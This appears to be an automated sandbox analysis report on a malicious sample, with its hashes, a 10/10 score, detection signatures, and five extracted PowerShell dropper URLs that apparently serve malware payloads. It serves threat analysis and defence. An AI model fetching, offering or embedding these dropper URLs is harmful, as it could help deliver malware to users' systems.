General

  • Target

    5363d121f8a11e509b99ce2734c313a2_JaffaCakes118

  • Size

    78KB

  • Sample

    240518-hapc7sga24

  • MD5

    5363d121f8a11e509b99ce2734c313a2

  • SHA1

    7710969f61d0f501dddeb143c42d0b6df3198a0e

  • SHA256

    cf187c7e1b979a14bbea861c7521838c0108c65c0f82465c0a30cddf16f4bea6

  • SHA512

    3831de3b76fa0244782d512087c6caa3e562786fbfcfcce55f9fe51677939ce720c8f3f709aebd7b6db019cb5d9c153a3c24635b5541c7ed1963357d0164de36

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHyU4rTDUdUNAMeWT:Ote2dw99fq4r3UdqAMe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blog.bctianfu.cn/4

exe.dropper

http://mail.vcacademy.lk/5nLo

exe.dropper

http://lamemoria.in/2ib2Pt

exe.dropper

http://tropicalislandrealtyofflorida.com/NNqM7W

exe.dropper

http://businessarbitr.ru/E

Targets

    • Target

      5363d121f8a11e509b99ce2734c313a2_JaffaCakes118

    • Size

      78KB

    • MD5

      5363d121f8a11e509b99ce2734c313a2

    • SHA1

      7710969f61d0f501dddeb143c42d0b6df3198a0e

    • SHA256

      cf187c7e1b979a14bbea861c7521838c0108c65c0f82465c0a30cddf16f4bea6

    • SHA512

      3831de3b76fa0244782d512087c6caa3e562786fbfcfcce55f9fe51677939ce720c8f3f709aebd7b6db019cb5d9c153a3c24635b5541c7ed1963357d0164de36

    • SSDEEP

      1536:SptJlmrJpmxlRw99NBk+aHyU4rTDUdUNAMeWT:Ote2dw99fq4r3UdqAMe

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks